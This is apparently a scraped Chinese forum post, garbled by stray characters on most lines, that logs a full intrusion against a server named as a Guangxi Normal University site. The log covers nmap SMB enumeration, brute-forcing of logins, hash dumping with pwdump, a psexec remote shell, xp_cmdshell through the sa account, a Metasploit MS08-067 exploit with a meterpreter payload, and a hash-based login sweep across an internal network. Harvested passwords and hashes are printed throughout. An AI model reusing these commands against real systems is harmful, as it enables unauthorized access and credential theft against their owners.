广西师范网站http://202.103.242.241/ _8 Y& i2 I5 D M
* v( @. M$ ?- p" V. a5 l# Z8 h
root@bt:~# nmap -sS -sV 202.103.242.241
4 \( B; [2 Q4 Y$ \, T0 z9 r( ~9 n d& T5 T" W2 z* y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
, C' Q( A7 j( Q2 K; c/ H1 }; M6 [8 D n5 t
Nmap scan report for bogon (202.103.242.241)2 c1 }- O: ]+ n+ `
9 V$ B7 h x5 n3 y" u3 gHost is up (0.00048s latency).9 T" | w `2 U2 w- @
" y0 J; k) R- A0 c: v9 ONot shown: 993 closed ports
D4 c$ H- K9 x
1 E. e- t0 L. H/ ]: S8 \0 T0 {PORT STATE SERVICE VERSION A$ h [ ]) d1 W8 p8 {3 A7 q- [
" e6 _- y, V+ w
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
. R1 n0 D# W* {* {# p2 }! g2 _1 f m3 l( J; S4 S9 Q
139/tcp open netbios-ssn" t% E% X0 ]- ]- g
; T W: O% q. h$ w6 x4 t445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
% {$ h, E. e( u! R7 f$ m+ g6 v4 B
/ J. ^( a$ L5 H1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)* V# q" C" F, m; p" F6 S! \
0 K* f: n4 I( h5 z
1026/tcp open msrpc Microsoft Windows RPC& n6 e5 A5 c6 L( c0 R! l9 ]* d0 W
) }1 Y- O3 @; { b3372/tcp open msdtc?
; y# C$ j4 E# X7 a- e/ `' h
. L1 L* i4 U2 z" w& N" z4 x3389/tcp open ms-term-serv?
$ G) a7 ?1 g: V4 M! Q, g$ t- V7 e, R, f1 v: L& u
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
; r6 X0 `5 k7 d |( [SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r6 T) d7 r' D6 H" i$ n& a
7 X/ f% Y/ A: a1 |' V8 U% |
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
" @- u! g' a! Q' L) l w( Z8 ?. q# W
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
_5 H; ]1 X. u9 g6 q4 X1 [, S" y5 J1 n
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO. [/ d6 k' A9 H- O" t: P
6 K0 r- [, S& {1 E4 cSF:ptions,6,”hO\n\x000Z”);3 W- x, ]- q- p) G
2 }! B% {2 l% l& K# u
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& K6 d) i# ]4 X3 y& G
8 F0 M0 s8 c& lService Info: OS: Windows- c" J3 @8 S9 t% @7 q
5 H7 ]* M6 S8 M$ Z: l$ {
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
) p0 f9 }" r& J+ `- q# j6 l2 C- H4 s! n
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
2 P" E: Q. Q3 _ J( r" @ N! U. o# t
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
* @* i4 j1 f/ d) `' N: ]. ?# c2 f; s4 @( Y4 Z) R6 o
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse" r5 m2 \& k; R- o
. I3 V2 J! w' y+ p: @1 H1 Q-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse; f0 _! F; b5 \* a2 C8 G z
# b% r& x1 N* r3 Z+ C
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse" D d: E" S* ^6 G4 x, C$ p0 w
5 t# _( P, j8 x5 e1 Y( i
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
/ u, Z9 D( ^+ j# z, o+ z* b6 _% ^0 H& m( M6 p
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
. P# C9 u0 {0 s/ T, S8 m, |9 O* J' y
4 Q1 U% l% f3 n-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
: p' k4 M# ^% T; ?0 U7 f+ o$ K/ K( Q* H0 v0 L
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse" O$ \) W0 @5 Q' a3 e; l3 G
2 M6 A( k6 J% s5 Y# T
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse( J& h& m2 a5 ^2 z* Q, i
$ C3 K* J% {1 A8 C-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse( R% H( @2 Q5 I+ ~
: R9 R ^% B6 e) I F+ x-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse1 ]5 r# ?1 x7 B3 D! M' w; q
9 F" ]4 {7 @+ ~7 ^/ X3 R0 \& P
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse6 v5 t0 E( H ]6 o: {) L
' o2 k% Q) s. m% n' [
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
% l2 \& ?! |/ M) e' Q7 @! I
7 W2 a/ P) Z3 J3 j8 G- r2 _-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse3 R& y/ ?9 g6 h9 q; Q
7 ^1 b- h( f6 L* `7 B-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
: m: i! j6 B: S6 }& F- g. q, ~
& |) N) n6 F: @3 _! c+ U2 E5 ^-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
. S. S. c& ]/ |6 P$ U# _' j o; v8 Y: s9 q/ ^
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
$ ~) O- _ n6 i) d# b' R/ O, j# K1 W, E. Q$ s0 h# {6 ^7 e: L
//此乃使用脚本扫描远程机器所存在的账户名
0 _# Q. z* o1 p, B5 H2 c
Y2 Z: ^% o% K- _8 SStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST! |3 v* b, o& Z( j) C0 O% S! b
1 Q4 n+ q- v, C3 QNmap scan report for bogon (202.103.242.241); p# P8 a7 j' k. K: k) l0 L0 k+ B
: X) [, T6 r7 K# f. T
Host is up (0.00038s latency).' G/ |5 R0 t) F' u, l2 n
, j# C5 c' M; b N5 I% \3 V' F- pNot shown: 993 closed ports4 f- h# \. ]8 v8 n) O7 X
1 c6 W0 B. W' b7 qPORT STATE SERVICE; R5 ?% M7 S3 ^) h4 T
& U3 j. Z0 _( p2 b1 v3 _( p
135/tcp open msrpc
! K0 h3 Q; T7 F2 l. t1 E: n5 R7 t `7 h
139/tcp open netbios-ssn
7 J2 u: J: g; U/ D
7 q1 Q' {) m+ m* S5 e$ m# L445/tcp open microsoft-ds
; }* R& W6 `% k! e8 z, V
& r. \" P( w0 \, @$ }7 |; [1025/tcp open NFS-or-IIS
+ C' ?$ ~* t+ Q E. _% b6 c! h, e' n
1026/tcp open LSA-or-nterm( Q/ }) x, {9 i- M( V* ~7 F
" s) F' `3 s* n' g
3372/tcp open msdtc7 c+ q& T6 N( j) X8 U! b" Y2 X
0 | X a) O* a* P3389/tcp open ms-term-serv$ t. @( I l# Q- N# i
" t2 q+ |6 B+ }) c3 b, NMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
$ o$ C) M7 z: {- K
/ F/ D5 l/ `2 X$ vHost script results:9 q- i: s; Y0 l0 U& j8 w
3 b1 E* ]* D" X( a) r) k
| smb-enum-users:
( l3 }: H# a2 v# F0 P7 z
0 W7 C2 ~0 B% d|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
0 S$ c" y( Q/ L. a9 Z
& ~0 ~; J9 I2 @7 l& ^ U# \9 h! C0 |Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds" ]2 B6 F+ Y% J+ S7 w
; W* @8 i3 ~/ t- i0 r
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 / A6 w+ E- a( l. e0 y
/ F4 N2 r; w1 h' S
//查看共享
2 q* M& _" k! I
A' |2 Y# K, gStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
8 s9 s# c3 l: w% [3 A3 U- C) R, W
: k; \7 o' S; g, _Nmap scan report for bogon (202.103.242.241)
9 J5 J5 F6 E; f( g
, K2 [: e4 n1 R% ]3 B( c7 WHost is up (0.00035s latency).
1 V' y' C. j* v& b; r$ m7 i1 h
2 T h: C7 B& Q* ~; `Not shown: 993 closed ports8 [. ^1 p9 w5 U# Y' i6 `
8 D$ |. [, k' p6 L' _0 R6 Z& \ V0 s
PORT STATE SERVICE8 a' z# s$ p& |' W$ y1 a) G) M
' ` W0 k0 o/ y0 ^135/tcp open msrpc1 n7 U0 U4 j' F1 {
& Q. j) Z5 ^& A- g139/tcp open netbios-ssn
# N6 G: N0 S1 R2 H) _5 z9 _
9 j- v* Y2 F* G2 y, q$ o: U) S6 j445/tcp open microsoft-ds
9 x6 m0 u5 [! p7 D' P9 }0 l" m1 p
1025/tcp open NFS-or-IIS0 C s. @4 x. z2 k; C& U. S
: w9 f, c; t: W0 Z7 s+ _2 E1 ~, l1026/tcp open LSA-or-nterm! p: q7 D% |- V& x1 H8 w
8 |4 L P. O* l3372/tcp open msdtc
( I7 w4 R( c6 j3 u% a: }) F6 F! l9 O
3389/tcp open ms-term-serv: x- O, a2 ^7 `/ L3 z" w- a
8 ~% [' m5 z5 MMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
% Y/ i5 Z: D% I( M) _9 U# H( }. a+ w/ t
Host script results:+ E( D% T" z3 d" s! @- V1 B
% F4 E$ M# f. R, l0 a. q- V| smb-enum-shares:
& i1 i, `; F0 C4 |- P' k8 e* H7 G; D
' Y* Y* d6 W) u! _0 K2 c \& [+ K| ADMIN$: r( w! l9 {4 x% W: Y1 {$ |1 b9 H
. f) K# D8 \4 I| Anonymous access: <none>" y$ ^7 q' v) F- f
- U) f5 ~1 J0 n3 h| C$
0 t% I2 ?( B2 \- _0 f% H5 b! {9 y8 d# t# Y$ S$ E
| Anonymous access: <none>3 l& j6 d3 c) X4 n; x
- Q# K- N5 ] }1 N) w+ k
| IPC$# z4 G& s( E5 r
, C& E, G! J1 C; Z
|_ Anonymous access: READ, R( T& [* s) Q( B
2 j s# A6 f, w3 d( P+ [( U1 C' INmap done: 1 IP address (1 host up) scanned in 1.05 seconds
2 V" V) V" m* I {+ L* J2 o
( k6 w9 L; g' z$ @root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 3 u x, a! D& b' `' ~. `; o, h
# {$ X# X. F D R//获取用户密码; M8 I2 W" s1 }6 e+ ]0 K; ~- ^
+ e: i8 S5 E; U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
2 a) I/ t3 I7 W) d4 Z3 U7 i& r6 y9 j) I" z) S- P
Nmap scan report for bogon (202.103.242.2418)
9 Y& d% m, b2 ?: H o6 s$ u7 T3 \) U6 @- U
Host is up (0.00041s latency).% n+ Z0 [. v u* ~: ]
* w$ g; c) q& C& z1 w
Not shown: 993 closed ports
. N# a3 r" _. D$ v1 }% l7 Z3 K& }" X- O u( n) V
PORT STATE SERVICE
2 W1 n2 c% @" ~2 h L, X' k t* X/ a7 t9 _ C
135/tcp open msrpc
1 H7 Q b1 u, h, U9 {$ p
9 Q/ F9 a3 [9 v9 a$ e139/tcp open netbios-ssn8 V6 S* L+ g7 ?! c
: Z+ c, w) j1 z4 e445/tcp open microsoft-ds
+ C: t8 N9 Z0 [/ X/ e+ D
* y3 {0 p: h0 a1025/tcp open NFS-or-IIS2 X7 D& C L* o( g9 f
3 e2 l% j( [0 o+ B) w1026/tcp open LSA-or-nterm
+ p" m# g2 A+ a2 B$ y. _/ Z% G3 P3 l* L n( w
3372/tcp open msdtc
1 o3 ]9 r u; _/ d) v, }- Y% d5 j& p3 |7 m2 }3 W/ Q6 V& { I
3389/tcp open ms-term-serv, \) v) _" Q! g3 W
7 Q: j$ Y" {5 z1 Z/ X" `MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)3 D& g- [! ?6 X3 }# k" }
8 C7 l8 H% [: L/ n; L
Host script results:
3 {# G' z9 G e. o& J- `* L
( r# G8 g- k: p$ z; \| smb-brute:& X# v) {; `+ r; v1 F6 u8 L
, k" ~% [+ ]0 g4 V4 `1 u1 Q
administrator:<blank> => Login was successful
" W8 E- x; g. P* J: v
9 v; d$ }% y! L/ d1 b: `1 l9 _|_ test:123456 => Login was successful$ }- i) V1 L- d9 }, C
* P6 C# m' _* q5 F
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
! M# K# V# u: o; R' t3 e4 x
! a! Y- v5 w6 N8 ?root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash0 \: S3 a' N2 F& D3 v5 F
& \7 F o( C `+ @( a% h
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data: } S2 {$ W! F) N/ G2 E* u
) ~* Q. ]# b S; }- c* s
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
. \. f- [+ e# f1 @8 c2 D4 Q- X" j6 p
0 L1 |2 H; Y. O5 Y( ~root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1399 _, r, t) }+ z5 G- R
5 }; T, k& n9 [Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST* H" ~- \ l+ o/ ~" N% H3 H! x
# `1 {* @/ ?! }# E! r
Nmap scan report for bogon (202.103.242.241)
# ?3 K* r9 F* F8 l& a v* }* B4 z7 T6 [ S1 G1 a7 a% [( b C
Host is up (0.0012s latency).
- L t! E: l1 ^7 ]0 f* D7 s& U. c1 L! x Q6 ~- ~6 h
PORT STATE SERVICE$ a9 ]+ _0 c& E6 v: \, ^
* S- ]1 G3 _- @- Z4 e( g/ l- a9 [135/tcp open msrpc
0 G- K' {1 _3 H) D1 G$ ?6 y! E6 [- M2 ~+ g' x* z" e8 p
139/tcp open netbios-ssn4 h5 v8 E! M: R8 I
1 H4 {' x1 }# s2 ]' h445/tcp open microsoft-ds2 p0 Y. a- I M; ]2 e& @
; d) l S6 A6 `- P2 ~1 n
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
, C. ^, n' O, S- f# B
|' W$ B6 l* Y1 Y5 O- FHost script results:
/ E# A1 a5 @$ {6 E; Y( k- D: \' r
| smb-pwdump:
5 A' u9 f/ y" r0 _/ S) ^$ A( Z. C# k3 E7 J# h$ L
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
' s+ _: E; B. i, F! t
0 O; S/ e& _3 Q/ z' h| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
/ i0 N- H7 c& w4 e4 f0 X6 v- ~
1 A1 S, ?3 V8 S. U+ P| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
1 {. @4 f6 `1 ]% n: T+ R, t8 O3 f+ h
8 C. L( ]5 y" d|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
" A& R* x/ F4 a4 t7 x
0 n Z2 T2 W0 l8 g5 D) N$ @Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds. H3 ?) U: R9 M- ?
) j0 i" t4 V$ M1 V; R$ D0 YC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell4 m( D4 D1 Y! R1 I
) K5 ^/ g2 k/ T$ e e
-p 123456 -e cmd.exe
" Q9 ^* }, n/ R. [6 K1 `' I6 ^2 r& b- W% T
PsExec v1.55 – Execute processes remotely& }5 q# ]6 S$ o" A, `
" C* D" E* C" g" r8 V. r' @5 _Copyright (C) 2001-2004 Mark Russinovich4 R: r$ c- n) g
1 G" ?4 e; L Q0 KSysinternals – www.sysinternals.com
$ }+ w" m+ }$ j6 V: y& `) d! T; r' ^; n& h( b
Microsoft Windows 2000 [Version 5.00.2195]
5 A( u0 b+ J+ e, @. f q+ @/ S" J: V; q: D+ k& E8 r
(C) 版权所有 1985-2000 Microsoft Corp.* S# N7 k+ ~" g h/ t4 f0 L
( ] z& n' F* o; {8 ]
C:\WINNT\system32>ipconfig( F9 v! f6 ]. ~- G
6 _: N& e$ e3 y2 V h/ gWindows 2000 IP Configuration
+ s* ]9 N- n( m0 }
4 [: {: C- Y& e) v7 v3 ?Ethernet adapter 本地连接:' F" h8 A& t# l6 }' J
, y0 a# ~+ P/ s! w5 R" }. P' `3 n, ]
Connection-specific DNS Suffix . :' M+ U/ W4 F! b. |! @% y
7 ]( U& O: M. |9 M( u
IP Address. . . . . . . . . . . . : 202.103.242.241. v! u1 R; [: q
' A; z6 w8 n4 J3 c8 J
Subnet Mask . . . . . . . . . . . : 255.255.255.0; Y% z% U9 x5 X$ `+ L( }
$ Q0 j1 B3 ^* X" |2 ~! B
Default Gateway . . . . . . . . . : 202.103.1.1
& x% V$ @% l' Z W3 X& c) z o# O$ p" W
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
! o/ n/ U1 t' E, v! C& f4 U5 J6 H% Z3 ^3 B. R6 `3 T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞! `% c* o8 d% c' e4 ]" \# i+ a
7 [3 Y4 Q# z& L" K2 f( o8 g. X" UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
8 R( u. o7 o9 J' a- m. \3 m( _
8 o) ^( |3 }# j; k: i+ wNmap scan report for bogon (202.103.242.241)
+ I6 T( J6 e V3 N; a; y; v& I+ p9 T1 A/ w0 p& k1 a F8 }' u; K' Z
Host is up (0.00046s latency).
4 r. d. m' E) U7 h' `* N
( N6 n @1 I& R0 c: x7 s# \( ZNot shown: 993 closed ports* x8 R& h) `6 B: p
. e2 P7 p6 f9 @: `7 C7 E$ o& u
PORT STATE SERVICE6 F& v5 Z3 g+ i6 Y5 G' w
/ m! o% m/ {! k
135/tcp open msrpc$ `% o/ O/ j6 ~
$ s8 Q/ Y8 j2 X2 I" {$ X
139/tcp open netbios-ssn5 B3 q/ x1 v N3 ?" ~/ E
' K* W( _) N/ }8 ~# Y
445/tcp open microsoft-ds
6 [) T& l! C0 v( s" Y7 i* T* G8 E1 _& c" i- P; G. ?6 N
1025/tcp open NFS-or-IIS# p; D+ [2 ~& @6 d1 ~
3 F- ] T. F5 Q9 Z- P
1026/tcp open LSA-or-nterm5 M& b9 l F% r1 G8 o- g o2 p
' t5 A% s; L, N/ w* I/ `3372/tcp open msdtc
( _' h& [/ {! o- E/ k
! N, S' g1 k2 \3 Z1 c3389/tcp open ms-term-serv
" ~: {) \ G# ]1 Q' D
' u, n8 u+ G* _% @MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
; E- T2 x0 a! E, x+ d* @
5 ]6 I' K4 n P8 [& T! AHost script results:
) X( g. x' C( f1 v ~$ e& N& i
+ x( ^& H; E0 j$ h| smb-check-vulns:
8 ]) Y. Y' y7 y! N7 Q/ M4 l
; C" c! B7 h4 d9 a& C|_ MS08-067: VULNERABLE+ K1 r; D! s7 C6 Q
- ]) [8 E/ M3 w9 JNmap done: 1 IP address (1 host up) scanned in 1.43 seconds2 c+ M8 {6 F7 R3 R/ @1 }: v
% h1 T: s) M+ t! A E' c+ n
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出0 Y( a4 U8 u1 `$ @# b
9 z! C$ Q5 \5 ^. [/ I/ k3 {. _
msf > search ms08
' W& w1 M6 G- B' ]; m! s6 [& b8 ]: s& N0 ?: ^9 G8 L- t# I2 C
msf > use exploit/windows/smb/ms08_067_netapi; k0 n7 c6 T8 N
% S% {% G% Z3 M6 amsf exploit(ms08_067_netapi) > show options
/ z4 ]4 k# _2 a, I5 N q. [6 r; p! S, C0 n; i, U+ I
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
+ L5 ^2 j- D) }/ \* F' H
2 x: w& C$ F( J/ \+ qmsf exploit(ms08_067_netapi) > show payloads% Z- T8 m1 j2 b+ P: Y: z. q
9 g* T& f$ x$ A# K1 \msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
7 ]+ A1 c3 R, \& ]" X5 \9 j- V
1 e; O' N- p( L) {/ B# W$ X. tmsf exploit(ms08_067_netapi) > exploit
, h9 ^, L" d1 {
6 Z; c$ D* @' W# s+ Pmeterpreter >
S) Y$ e% v+ `/ \6 j( k+ \
" C# E7 k$ I& A; B4 zBackground session 2? [y/N] (ctrl+z)3 v. s* V2 m7 L. m5 S! g$ V" g! h
7 F4 Q; a* c$ m
msf exploit(ms08_067_netapi) > sessions -l
( Q! y! \2 M! }, Z6 F0 o# c% ^" L% |
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
' @& m$ J5 H7 U
/ }. ^# X* I+ t6 @( @test6 y$ b0 N# e/ }& k: i2 e b
. K2 P% V( d' ^' x5 [ }administrator2 A6 C( ?( w! T" x% E+ L u
- I# `1 j* Z- ~6 Y( i, s* x5 ?0 X
root@bt:/usr/local/share/nmap/scripts# vim password.txt
4 _% M8 t3 W, i1 F0 Y- Q0 Y# N1 k, _4 s" Y& e4 A9 ^; K
44EFCE164AB921CAAAD3B435B51404EE
1 E3 c6 X, G/ B$ q0 Y3 ]3 U) k! G' T; A0 S/ X, z
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
9 }" s5 T, {- P" _) T$ o3 P* U5 o. t0 t" B" x
//利用用户名跟获取的hash尝试对整段内网进行登录
& S* j3 s. H. G8 i& g4 ?; l
) W% U6 b) g: k1 c4 mNmap scan report for 192.168.1.105. F" X. V* p& g! K* _! ~ v
+ T) f6 P3 X2 `
Host is up (0.00088s latency).; ^4 U4 a* ~. E! V
$ K" \6 p( }9 W! A2 XNot shown: 993 closed ports
2 Y; Q( H( I, X) d
" e: U1 _8 J# a- [" N* V; o( HPORT STATE SERVICE
' V8 f4 _, i; }& z- M
& @3 [: \; k0 E( V. U* {135/tcp open msrpc- u; N% B! ^( C
9 k/ w, ~% W4 v2 G% h2 i
139/tcp open netbios-ssn
3 v6 W: x7 }/ {" m% W$ x4 q% N: x) p4 v9 N5 V/ T" K9 E9 L" J
445/tcp open microsoft-ds
( u. s/ F( ^$ h* L3 i8 [
9 e; b t6 K0 C8 i$ s1025/tcp open NFS-or-IIS
; O4 \! `; G7 y ^
' f3 m( u' L0 q1 v1026/tcp open LSA-or-nterm \3 ~+ {7 ]% X! y, O2 ` g9 S% J
( j8 Q2 y2 n: ] n8 V* @$ S
3372/tcp open msdtc
6 T, R2 j! b& T/ Y
6 g+ G/ j1 ^4 u) [: f5 C% }3389/tcp open ms-term-serv
7 e6 A: c3 j$ C0 O
( ~9 I: O% o) v: W+ O |! eMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems), c- X& b. p( T2 ]2 k( }" Y+ C4 N
) I$ _# g$ s5 B
Host script results:: v. L& E0 o Q6 @6 a
: T' b1 C- M2 S6 ^5 K3 M| smb-brute:& x( a/ E9 K* W3 L- [1 }/ Q/ V
. i6 R- z5 v+ }! l7 f
|_ administrator:<blank> => Login was successful
' b" P& h7 l# Z6 L7 |* B ~( Z; m; z
攻击成功,一个简单的msf+nmap攻击~~·
" b3 s/ t* e6 X k# Q3 Z3 s7 F. G) h' S8 Z, k4 _6 d
|